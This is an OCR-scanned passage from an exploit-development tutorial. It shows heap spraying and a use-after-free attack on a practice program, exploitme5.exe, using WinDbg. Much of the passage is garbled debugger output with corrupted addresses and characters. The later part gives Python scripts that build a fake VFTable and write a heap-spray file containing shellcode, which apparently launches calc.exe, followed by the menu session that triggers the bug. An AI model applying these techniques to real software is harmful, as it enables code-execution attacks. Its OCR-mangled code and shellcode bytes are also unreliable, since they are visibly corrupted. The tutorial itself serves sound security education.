07730000 - 07730000 (size 00000000) 
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Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 


07830000 - 07830000 (size 00000000) 
07930000 - 07930000 (size 00000000) 
07а30000 - 07а30000 (size 00000000) 
07530000 - 07630000 (size 00000000) 
07с30000 - 07с30000 (size 00000000) 
07430000 - 07430000 (віге 00000000 
07е30000 - 07е30000 (size 00000000 
07130000 - 07130000 (size 00000000) 
08030000 - 08030000 (size 00000000) 
08130000 - 08130000 (size 00000000) 
08230000 - 08230000 (size 00000000) 
08330000 - 08330000 (size 00000000) 
08430000 - 08430000 (size 00000000) 
08530000 - 08530000 (size 00000000) 
08630000 - 08630000 (size 00000000) 

( 

( 

( 

( 

( 


) 
) 


08730000 - 08730000 (size 00000000) 
08830000 - 08830000 (size 00000000) 
08930000 - 08930000 (size 00000000) 
08а30000 - 08а30000 (size 00000000) 
08530000 - 08630000 (size 00000000) 
08с30000 - 08230000 (size 00000000) 
08430000 - 08430000 (size 00000000 
08е30000 - 08е30000 (size 00000000 
08130000 - 08130000 (size 00000000) 
09030000 - 09030000 (size 00000000 
09130000 - 09130000 (size 00000000 
09230000 - 09230000 (size 00000000 
09330000 - 09330000 (size 00000000 
09430000 - 09430000 (size 00000000 

( 

( 

( 


) 
) 


09530000 - 09530000 (size 00000000 
09630000 - 09630000 (size 00000000 


) 
) 
) 
) 
) 
) 
) 
09730000 - 09730000 (size 00000000) 
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Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 


09830000 - 09830000 (size 00000000) 
09930000 - 09930000 (size 00000000) 
09а30000 - 09a30000 (size 00000000) 
09530000 - 09930000 (size 00000000) 
09с30000 - 09с30000 (size 00000000) 
09430000 - 09430000 (size 00000000 
09е30000 - 09е30000 (size 00000000 
09130000 - 09130000 (size 00000000) 
0a030000 - 0a030000 (size 00000000) 
0а130000 - 0а130000 (size 00000000) 
0а230000 - 0а230000 (size 00000000) 
0а330000 - 0a330000 (size 00000000) 
0а430000 - 0а430000 (size 00000000) 
0а530000 - Оа530000 (size 00000000) 
0а630000 - Оа630000 (size 00000000) 

( 

( 

( 

( 

( 


) 
) 


0а730000 - 0а730000 (size 00000000) 
04830000 - 0а830000 (size 00000000) 
0а930000 - Оа930000 (size 00000000) 
Оаа30000 - Оаа30000 (size 00000000) 
Оар30000 - Оар30000 (size 00000000) 
0ас30000 - Оас30000 (size 00000000) 
Oad30000 - Оаазоооо (size 00000000 
Оае30000 - ОаеЗ0000 (size 00000000 
Oaf30000 - 0а130000 (size 00000000) 
06030000 - 05030000 (size 00000000 
06130000 - 06130000 (size 00000000 
06230000 - 06230000 (size 00000000 
06330000 - 06330000 (size 00000000 
06430000 - 06430000 (size 00000000 

( 

( 

( 


) 
) 


06530000 - 06530000 (size 00000000 
06630000 - 06630000 (size 00000000 


) 
) 
) 
) 
) 
) 
) 
06730000 - 05730000 (size 00000000) 
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Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 


06830000 - 06830000 (size 00000000) 
06930000 - 05930000 (size 00000000) 
0ba30000 - ОБа30000 (size 00000000) 
06630000 - 06630000 (size 00000000) 
06с30000 - 0630000 (size 00000000) 
064930000 - 06930000 (size 00000000 
06е30000 - 0be30000 (size 00000000 
061730000 - 00130000 (size 00000000) 
0с030000 - 0с030000 (size 00000000) 
0с130000 - 0с130000 (size 00000000) 
0с230000 - 0с230000 (size 00000000) 
0с330000 - 0c330000 (size 00000000) 
0с430000 - 0с430000 (size 00000000) 
0с530000 - 0с530000 (size 00000000) 
0с630000 - 0с630000 (size 00000000) 

( 

( 

( 

( 

( 


) 
) 


0с730000 - 0с730000 (size 00000000) 
0с830000 - 0с830000 (size 00000000) 
0с930000 - 0с930000 (size 00000000) 
0са30000 - Оса30000 (size 00000000) 
0с030000 - 0cb 30000 (size 00000000) 
0сс30000 - 0сс30000 (size 00000000) 
0с430000 - 0с430000 (size 00000000 
Осез0000 - Осе30000 (size 00000000 
Ocf30000 - Ocf30000 (size 00000000) 
04030000 - 04030000 (size 00000000 
04130000 - 04130000 (5їге 00000000 
04230000 - 04230000 (size 00000000 
04330000 - 04330000 (size 00000000 
00430000 - 04430000 (size 00000000 

( 

( 

( 


) 
) 


04530000 - 04530000 (size 00000000 
04630000 - 04630000 (size 00000000 
04730000 - 04730000 (size 00000000 


) 
) 
) 
) 
) 
) 
) 
) 
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Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 


04830000 - 04830000 (size 00000000) 
04930000 - 04930000 (size 00000000) 
09а30000 - 04а30000 (size 00000000) 
09630000 - 04930000 (size 00000000) 
04с30000 - 04с30000 (size 00000000) 
04430000 - 04430000 (size 00000000 
Ode30000 - 04е30000 (size 00000000 
09130000 - 04130000 (size 00000000) 
0e030000 - 0е030000 (size 00000000) 
0е130000 - 0е130000 (size 00000000) 
0е230000 - 0е230000 (size 00000000) 
0е330000 - 0е330000 (size 00000000) 
0е430000 - 0е430000 (size 00000000) 
0е530000 - 0е530000 (size 00000000) 
( ) 

( ) 

( ) 

( ) 

) 


) 
) 


06630000 - 0е630000 (size 00000000 
0е730000 - 0e730000 (size 00000000 
Ое830000 - Ое830000 (size 00000000 
0е930000 - 0е930000 (size 00000000 
0еа30000 - Оеа30000 (size 00000000 


00660000 40000062 1024 188 1024 93 9 1 201 
00350000 40001062 64 12 64 2 2 1 0 0 
00аа40000 40001062 1088 160 1088 68 5 2 0 
00240000 40001062 256 4 256 2 


0 


0 





Perfect! Now the size of the junk data is just 0x30 bytes. You can verify that 0x30 is the minimum. If you try 
with Ox2f, it won't work. 


Let’s restart exploitme5.exe and redo it again. This time WinDbg prints the following: 


0:001> !heap -s 
NtGlobalFlag enables following debugging aids for new heaps: 


tail checking 


free checking 
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validate parameters 
LFH Key : 0x38c66846 
Termination on corruption : ENABLED 
Heap Flags Reserv Commit Virt Free List UCR Virt Lock Fast 
(к) (к) (k) (k)length X blocks cont. heap 


Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 


02070000 - 02070000 (size 00000000) 
02270000 - 02270000 (size 00000000) 
02370000 - 02370000 (size 00000000) 
02470000 - 02470000 (size 00000000) 
02570000 - 02570000 (size 00000000) 
02670000 - 02670000 (size 00000000) 

( 

( 

( 

( 

( 


02770000 - 02770000 (size 00000000) 
02870000 - 02870000 (вїге 00000000) 
02970000 - 02970000 (size 00000000) 
02а70000 - 02а70000 (size 00000000) 
02570000 - 02670000 (size 00000000) 
02с70000 - 02с70000 (size 00000000) 
02470000 - 02470000 (size 00000000 
02е70000 - 02е70000 (віге 00000000 
02f70000 - 02170000 (size 00000000) 
03070000 - 03070000 (size 00000000) 
03170000 - 03170000 (size 00000000) 
03270000 - 03270000 (size 00000000) 
03370000 - 03370000 (size 00000000) 
03470000 - 03470000 (size 00000000) 
03570000 - 03570000 (size 00000000) 

) 

) 

) 

) 

) 


) 
) 


03670000 - 03670000 (size 00000000 
03770000 - 03770000 (size 00000000 
03870000 - 03870000 (size 00000000 
03970000 - 03970000 (віге 00000000 
03а70000 - 03а70000 (size 00000000 
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Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 


03070000 - 03670000 (size 00000000) 
03с70000 - 03с70000 (size 00000000) 
03470000 - 03470000 (size 00000000 
03е70000 - 03e70000 (size 00000000 
03170000 - 03170000 (size 00000000) 
04070000 - 04070000 (size 00000000) 
04170000 - 04170000 (size 00000000) 
04270000 - 04270000 (size 00000000) 
04370000 - 04370000 (size 00000000) 
04470000 - 04470000 (size 00000000) 
04570000 - 04570000 (size 00000000) 
04670000 - 04670000 (size 00000000) 

( 

( 

( 

( 

( 


) 
) 


04770000 - 04770000 (size 00000000) 
04870000 - 04870000 (size 00000000) 
04970000 - 04970000 (size 00000000) 
04а70000 - 04а70000 (size 00000000) 
04070000 - 04670000 (size 00000000) 
0470000 - 04с70000 (size 00000000) 
04470000 - 04470000 (size 00000000 
04е70000 - 04е70000 (size 00000000 
04170000 - 04170000 (віге 00000000) 
05070000 - 05070000 (size 00000000) 
05170000 - 05170000 (size 00000000) 
05270000 - 05270000 (size 00000000) 
05370000 - 05370000 (size 00000000) 
05470000 - 05470000 (size 00000000) 
05570000 - 05570000 (size 00000000) 

) 

) 

) 

) 

) 


) 
) 


05670000 - 05670000 (size 00000000 
05770000 - 05770000 (size 00000000 
05870000 - 05870000 (віге 00000000 
05970000 - 05970000 (size 00000000 
05а70000 - 05а70000 (size 00000000 
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Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 


05070000 - 05670000 (size 00000000) 
05c70000 - 05с70000 (size 00000000) 
05470000 - 05470000 (size 00000000 
05е70000 - 05е70000 (size 00000000 
05170000 - 05170000 (віге 00000000) 
06070000 - 06070000 (size 00000000) 
06170000 - 06170000 (size 00000000) 
06270000 - 06270000 (size 00000000) 
06370000 - 06370000 (size 00000000) 
06470000 - 06470000 (size 00000000) 
06570000 - 06570000 (віге 00000000) 
06670000 - 06670000 (size 00000000) 

( 

( 

( 

( 

( 


) 
) 


06770000 - 06770000 (size 00000000) 
06870000 - 06870000 (size 00000000) 
06970000 - 06970000 (size 00000000) 
0ба70000 - Оба70000 (size 00000000) 
06070000 - 06670000 (size 00000000) 
06с70000 - 06с70000 (size 00000000) 
06470000 - 06470000 (size 00000000 
06е70000 - Обе70000 (size 00000000 
06170000 - 06170000 (size 00000000) 
07070000 - 07070000 (віге 00000000) 
07170000 - 07170000 (size 00000000) 
07270000 - 07270000 (size 00000000) 
07370000 - 07370000 (size 00000000) 
07470000 - 07470000 (вїге 00000000) 
07570000 - 07570000 (size 00000000) 

) 

) 

) 

) 

) 


) 
) 


07670000 - 07670000 (size 00000000 
07770000 - 07770000 (size 00000000 
07870000 - 07870000 (size 00000000 
07970000 - 07970000 (size 00000000 
07а70000 - 07а70000 (size 00000000 
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Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 


07b70000 - 07b70000 (size 00000000) 
07c70000 - 07с70000 (size 00000000) 
07470000 - 07470000 (size 00000000 
07е70000 - 07е70000 (size 00000000 
07170000 - 07170000 (size 00000000) 
08070000 - 08070000 (size 00000000) 
08170000 - 08170000 (вїге 00000000) 
08270000 - 08270000 (size 00000000) 
08370000 - 08370000 (size 00000000) 
08470000 - 08470000 (вїге 00000000) 
08570000 - 08570000 (size 00000000) 
08670000 - 08670000 (size 00000000) 

( 

( 

( 

( 

( 


) 
) 


08770000 - 08770000 (size 00000000) 
08870000 - 08870000 (size 00000000) 
08970000 - 08970000 (size 00000000) 
08а70000 - 08а70000 (size 00000000) 
08070000 - 08670000 (size 00000000) 
08с70000 - 08с70000 (size 00000000) 
08470000 - 08470000 (size 00000000 
08е70000 - 08е70000 (size 00000000 
08170000 - 08170000 (віге 00000000) 
09070000 - 09070000 (віге 00000000) 
09170000 - 09170000 (вїге 00000000) 
09270000 - 09270000 (size 00000000) 
09370000 - 09370000 (size 00000000) 
09470000 - 09470000 (вїге 00000000) 
09570000 - 09570000 (size 00000000) 

) 

) 

) 

) 

) 


) 
) 


09670000 - 09670000 (size 00000000 
09770000 - 09770000 (size 00000000 
09870000 - 09870000 (віге 00000000 
09970000 - 09970000 (size 00000000 
09а70000 - 09а70000 (size 00000000 
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Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 


09b70000 - 09b70000 (size 00000000) 
09с70000 - 09с70000 (size 00000000) 
09470000 - 09470000 (size 00000000 
09е70000 - 09е70000 (size 00000000 
09170000 - 09170000 (size 00000000) 
0a070000 - 0a070000 (size 00000000) 
0а170000 - 02170000 (size 00000000) 
0а270000 - Оа270000 (size 00000000) 
0а370000 - 0а370000 (size 00000000) 
04470000 - 0а470000 (size 00000000) 
0а570000 - 0а570000 (size 00000000) 
0а670000 - 0а670000 (size 00000000) 

( 

( 

( 

( 

( 


) 
) 


0a770000 - 0a770000 (size 00000000) 
0а870000 - 0а870000 (size 00000000) 
0а970000 - 0а970000 (size 00000000) 
Оаа70000 - Оаа70000 (size 00000000) 
Оар70000 - Оар70000 (size 00000000) 
0ас70000 - Оас70000 (size 00000000) 
0а970000 - 0Оа970000 (size 00000000 
0ае70000 - Оае70000 (size 00000000 
Oaf70000 - Оа!70000 (size 00000000) 
06070000 - 05070000 (size 00000000) 
06170000 - 06170000 (size 00000000) 
06270000 - 06270000 (size 00000000) 
06370000 - 09370000 (size 00000000) 
06470000 - 06470000 (size 00000000) 
06570000 - 06570000 (size 00000000) 

) 

) 

) 

) 

) 


) 
) 


06670000 - 06670000 (size 00000000 
06770000 - 06770000 (size 00000000 
06870000 - 06870000 (size 00000000 
06970000 - 05970000 (size 00000000 
0Ба70000 - ОБа70000 (size 00000000 
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Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 


06570000 - 06670000 (size 00000000) 
0рс70000 - 06с70000 (size 00000000) 
064970000 - 05470000 (size 00000000 
0Бе70000 - Оре70000 (size 00000000 
Obf70000 - 00170000 (size 00000000) 
0с070000 - 0с070000 (size 00000000) 
0с170000 - 0с170000 (size 00000000) 
0c270000 - 0с270000 (size 00000000) 
0с370000 - 0с370000 (size 00000000) 
0с470000 - 0с470000 (size 00000000 
0с570000 - 0с570000 (size 00000000 
0с670000 - 0с670000 (size 00000000) 

( 

( 

( 

( 

( 


) 
) 


) 
) 


0c770000 - 0c770000 (size 00000000) 
0с870000 - 06870000 (size 00000000) 
0c970000 - 0c970000 (size 00000000 
0са70000 - Оса70000 (size 00000000 
0ср70000 - 0ср70000 (size 00000000) 
0сс70000 - Occ70000 (size 00000000) 
0с470000 - 0са70000 (size 00000000 
0се70000 - Осе70000 (size 00000000 
Ocf70000 - Ocf70000 (size 00000000) 
0d070000 - 0d070000 (size 00000000) 
04170000 - 04170000 (size 00000000) 
04270000 - 04270000 (size 00000000) 
04370000 - 04370000 (size 00000000) 
00470000 - 09470000 (size 00000000) 
04570000 - 04570000 (size 00000000) 

) 

) 

) 

) 

) 


) 
) 


) 
) 


04670000 - 04670000 (size 00000000 
0d770000 - 0d770000 (size 00000000 
04870000 - 04870000 (size 00000000 
04970000 - 04970000 (size 00000000 
04а70000 - 04а70000 (size 00000000 
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Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 
Virtual block: 


04070000 - 09670000 (size 00000000) 
04с70000 - 04с70000 (size 00000000) 
04470000 - 04470000 (в51ге 00000000 
04е70000 - 04е70000 (size 00000000 
Odf70000 - Odf70000 (size 00000000) 
0е070000 - 0е070000 (size 00000000 
0е170000 - 0е170000 (size 00000000 
0е270000 - 0е270000 (size 00000000 
0е370000 - 0е370000 (size 00000000 


( 
( 
( 
0е470000 - 0е470000 (size 00000000 
( 
( 
( 
( 


) 
) 


0е570000 - 0e570000 (size 00000000 
Ое670000 - 0e670000 (size 00000000 
0e770000 - 0e770000 (size 00000000 
0е870000 - 0е870000 (size 00000000 


) 
) 
) 
) 
) 
) 
) 
) 
) 
0е970000 - 0е970000 (size 00000000) 


002d0000 40000062 1024 188 1024 93 9 1201 0 
00190000 40001062 64 12 64 2 2 1 0 0 
01d50000 40001062 1088 160 1088 68 5 2 0 0 
01d00000 40001062 256 4 256 2 





This time the addresses are different. Let's compare the last four: 


Virtual Боск: 0е730000 - 0е730000 (size 00000000) 
Virtual block: 06830000 - 06830000 (size 00000000) 
Virtual block: 06930000 - 06930000 (size 00000000) 
Virtual block: беаз0000 - беаз0000 (size 00000000) 


Virtual block: 0еб 70000 - 0е670000 (size 00000000) 
Virtual Боск: 0е770000 - 0е770000 (size 00000000) 
Virtual block: 0е8 70000 - Ое8 70000 (size 00000000) 

( ) 


Virtual block: 0е970000 - Ое970000 (size 00000000 
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What we note, though, is that they are always aligned on 0x10000 boundaries. Now remember that we must 
add 0x20 to those addresses because of the header: 


block 197: address = 0x0e670020; size = 1048528 
block 198: address = 0x0e770020; size = 1048528 


block 199: address = 0x0e870020; size = 1048528 
block 200: address = 0x0e970020; size = 1048528 





If we pad our payload so that its size is 0х10000 and we repeat it throughout our entire block of 1 MB (-0x30 
bytes), then we will certainly find our payload at, for example, the address 0x0a000020. We chose the 
address 0x0a000020 because it's in the middle of our heap spray so, even if the addresses vary a little bit, it 
Will certainly contain our payload. 


Let's try to do just that: 
Python 


(r'd:\buf.dat', 'wb') as f: 
'а'*0х8000 + 'b'*0x8000 





Note that since the size of our block is 0x30 bytes shorter than 1 MB, the last copy of our payload needs to 
be truncated. This is not a problem, of course. 


Now let's restart exploitme5.exe in WinDbg, run it, read the block from file, make 200 copies of it, break the 
execution, and, finally, inspect the memory at 0х0а000020: 

O9ffffd0 62 62 62 62 62 62 62 62-62 62 62 62 62 62 62 62 bbbbbbbbbbbbbbbb 

O9ffffe0 62 62 62 62 62 62 62 62-62 62 62 62 62 62 62 62 bbbbbbbbbbbbbbbb 

21110 62 62 62 62 62 62 62 62-62 62 62 62 62 62 62 62 bbbbbbbbbbbbbbbb 

0a000000 62 62 62 62 62 62 62 62-62 62 62 62 62 62 62 62 bbbbbbbbbbbbbbbb 

0а000010 62 62 62 62 62 62 62 62-62 62 62 62 62 62 62 62 bbbbbbbbbbbbbbbb 


02000020 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 аааааааааааааааа 
02000030 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 аааааааааааааааа 
0а000040 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 аааааааааааааааа 
02000050 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 аааааааааааааааа 
02000060 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 аааааааааааааааа 





As we can see, a copy of our payload starts exactly at Оха000020, just as we expected. Now we must put it 
all together and finally exploit exploitme5.exe. 
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The actual exploitation 


We saw that there is a UAF bug in . We can use this function to create a dangling pointer, 
. By reading a block of bytes (the size of ) from file, we can make the dangling 

pointer point to data we control. In particular, the first DWORD of this data will contain the value 

which is the address where we'll put the VFTable for taking control of the execution flow. 


Let's have a look at 
С++ 


void mutateBlock() | 
listBlocks(); 
while (tr 
printf("l 
int index; 


«0 || index >= (i 


ing ind 


[1-3]: "); 
int choice tch(); 
printf("\n\n" 
if (choice == '3') 
break; 

if (choice >= '1 
choice -= "0" 
mutators[choice - 1]-> (blocks[index].getData(), blocks[index].getSize()); 
printf("The Мос! ЕТ + 


Dr 


) 
7 


The interesting line is the following: 
С++ 


mutators[choice - 1]->mutate(blocks[index].getData(), blocks[index].getSiz 
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By choosing , Choice will be 1, so that line will evaluate to 
С++ 


mutators[0]->mutate(...); 





The method is the second virtual method in the VFTable of the . Therefore, at the address 
we'll put a VF Table with this form: 


0х0а000020: whatever 


0х0а000024: 0х0а000028 





When mutate is called, the execution will jump to the code at the address , exactly where our 
shellcode will reside. 


We know that we can spray the heap so that our payload lands at the address . Here’s the 
payload we'll be using: 


0х0а000020: “аааа” 0x0a000028 shellcode 


|- - 


VFTable 





Here’s the complete schema: 


168 bytes 
mutators[O] - >  VFTable ptr 


0x0a000020: "aaaa" 0x0a000028 shellcode 


ee 


VFTable 
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First let’s create 
Python 


t struct 
1 open(r'd:\obj.dat'’, 'wb") as f: 


vftable ptr = struct.pack('«l', 0х0а000020) 
f.write(vftable ptr + 'a'*164) 





Then let's create 
Python 


rt struct 
1 open(r'd:\buf.dat', 'wb') as f: 

shellcode = ( 
"ухеёхї х хх ХО ХОР А 1\x03\x02\x02\x8 1\xf1\x02\x02" + 
"\x02\x02\x83\xc7\x1 d\x33\xf6\xfc\x8a\x07\x3c\x02\x0f\x44\xc6\xaa" + 
"\xe2\xf6\x55\x8 b\xec\x83\xec\x0c\x56\x5 7\xb9\x7fixc0\xb4\x7b\xe8" + 
"\x55\x02\x02\x02\xb9\xe0\x53\x31\x4b\x8b\xf8\xe8\x49\x02\x02\x02" + 
"\x8b\xfO\xc7\x45\xf4\x63\x6 1\x6c\x63\x6alx05\x8d\x45\xf4\xc7\x45" + 
"\xf8\x2e\x65\x78\x65\x50\xc6\x45\xfc\x02\xffixd7\x6a\x02\xffixd6" + 
"\xSf\x33\xcO\x5e\x8b\xe5d\x5d\xc3\x33\xd2\xeb\x1 O\xc1\xca\xOd\x3c" + 
"\x6 1\xOfl\xbe\xcO\x7c\x03\x83\xe8\x20\x03\xd0\x4 1\x8a\x01\x84\xcO" + 
"\x75\xea\x8b\xc2\xc3\x8d\x4 1\xf8\xc3\x55\x8b\xec\x83\xec\x14\x53" + 
"\xX56\x57\x89\x4 d\xf4\x64\xa 1\x30\x02\x02\x02\x89\x4 5\xfc\x8b\x45" + 
"\xfc\x8b\x4 0\x0c\x8b\x40\x14\x8b\xf8\x89\x45\xec\x8b\xcfixe8\xd2" + 
"\xfflxffxffix8b\x3fx8b\x70\x1 8\x85\xf6\x74\x4fAx8b\x46\x3c\x8b" + 
"\x5c\x30\x7 8\x85\xdb\x74\x44\x8b\x4c\x33\x0c\x03\xce\xe8\x96\xff" + 
"\xfAXxffx8b\x4c\x33\x20\x89\x45\xf8\x03\xce\x33\xcO\x89\x4d\xfO" + 
"\x89\x4 S\xfc\x39\x44\x33\x 1 8\x76\x22\x8b\x0c\x81\x03\xce\xe8\x75" + 
"xffixffixff\x03\x45\xf8\x39\x45\xf4\x74\x 1e\x8b\x45\xfc\x8b\x4d" + 
"\xfO\x4.0\x89\x45\xfc\x3b\x44\x33\x18\x72\xde\x3b\x7d\xec\x75\x9c" + 
"\x33\xcO\xSfixS5e\x5b\x8b\xed\x5d\xc3\x8b\x4d\xfc\x8b\x44\x33\x24" + 
"\x8d\x04\x48\x0f\xb7\x0c\x30\x8b\x44\x33\x 1c\x8d\x04\x88\x8b\x04" + 
"\x30\x03\xc6\xeb\xdd") 

vftable = "аааа" + struct.pack('«l', 0х0а000028) 

code = vftable + shellcode + 'а"(0х10000 - len(shellcode) - len(vftable)) 

block_size = 0x100000-0x30 

block = code*(block_size/len(code)) + code[:block_size % len(code)] 

f.write(block) 





Now we need to run (ме don't need WinDbg) апа до the following: 


1) Read block from file 
2) List blocks 


) 
) 
3) Duplicate Block 
) 
) 


4) Configure mutator 


5) Mutate block 
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6) Exit 


Your choice [1-6]: 1 


File path ('exit' to exit): d:\obj.dat 


Block read (168 bytes) 


1) Read block from file 


2) List blocks 


4) Configure mutator 
5) Mutate block 
6) Exit 


) 
) 
3) Duplicate Block 
) 
) 
) 


Your choice [1-6]: 4 


1) Multiplier (multiplier = 2) 
2) LowerCaser 
3) Exit 


Your choice [1-3]: 1 


mutators[0] = 0x003dc488 
multiplier (int): asdf 

1) Read block from file 

2) List blocks 

3) Duplicate Block 

4) Configure mutator 

5) Mutate block 

6) Exit 
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Index of block to duplicate (-1 to exit): 0 
Number of copies (-1 to exit): 1 

1 
2) List blocks 


Read block from file 


) 

) 

3) Duplicate Block 
4) Configure mutator 
5) Mutate block 
6) Exit 


Your choice [1-6]: 2 


block 0: address = 0x003dc538; size = 168 
block 1: address = 0x003dc488; size = 168 


1 
2) List blocks 


Read block from file 


3) Duplicate Block 


5) Mutate block 


) 

) 

) 

4) Configure mutator 
) 

6) Exit 


Your choice [1-6]: 1 


File path ('exit' to exit): d:\buf.dat 





Block read (1048528 bytes) 


1) Read block from file 
2) List blocks 
3) Duplicate Block 
4) Configure mutator 
5) Mutate block 

) 


6) Exit 


Your choice [1-6]: 3 


block 0: address = 0x003dc538; size = 168 
block 1: address = 0x003dc488; size = 168 
block 2: address = 0х00с60020; size = 1048528 


Index of Боск to duplicate (-1 © exit): 2 

Number of copies (-1 to exit): 200 200 x 1 MB = 200 MB 
1) Read block from file 

2) List blocks 


3) Duplicate Block 


4) Configure mutator 


5) Mutate block 
6) Exit 


) 
) 
) 
) 
) 
) 


Your choice [1-6]: 5 


block 0: address = 0x003dc538; size = 168 
block 1: address = 0x003dc488; size = 168 
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block 2: 
block 3: 
block 4: 
block 5: 
block 6: 
block 7: 
block 8: 
block 9: 
block 10 
block 11 


block 12: 
block 13: 
block 14: 
block 15: 
block 16: 
block 17: 
block 18: 
block 19: 
block 20: 
block 21: 
block 22: 
block 23: 
block 24: 
block 25: 
block 26: 
block 27: 
block 28: 
block 29: 
Боск 30: 
block 31: 
block 32: 
block 33: 


address = 0x00c60020; size = 1048528 

address = 0х00е60020; size = 1048528 

address = 0x00f60020; size = 1048528 

address = 0х02480020; size = 1048528 

address = 0x02580020; size = 1048528 

address = 0x02680020; size = 1048528 

address = 0x02780020; size = 1048528 

address = 0x02880020; size = 1048528 

: address = 0х02980020; size = 1048528 
: address = 0х02а80020; size = 1048528 
address = 0x02b80020; size = 1048528 
address = 0x02c80020; size = 1048528 
address = 0х02080020; size = 1048528 
address = 0х02е80020; size = 1048528 
address = 0x02180020; size = 1048528 
address = 0x03080020; size = 1048528 
address = 0x03180020; size = 1048528 
address = 0x03280020; size = 1048528 
address = 0x03380020; size = 1048528 
address = 0x03480020; size = 1048528 
address = 0x03580020; size = 1048528 
address = 0x03680020; size = 1048528 
address = 0x03780020; size = 1048528 
address = 0x03880020; size = 1048528 
address = 0x03980020; size = 1048528 
address = 0x03a80020; size = 1048528 
address = 0x03b80020; size = 1048528 
address = 0x03c80020; size = 1048528 
address = 0х03480020; size = 1048528 
address = 0x03e80020; size = 1048528 
address = 0x03f80020; size = 1048528 
address = 0x04080020; size = 1048528 
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block 34: 
block 35: 
block 36: 
block 37: 
block 38: 
block 39: 
block 40: 
block 41: 
block 42: 
block 43: 
block 44: 
block 45: 
block 46: 
block 47: 
block 48: 
block 49: 
block 50: 
Боск 51: 
block 52: 
block 53: 
block 54: 
block 55: 
Боск 56: 
block 57: 
block 58: 
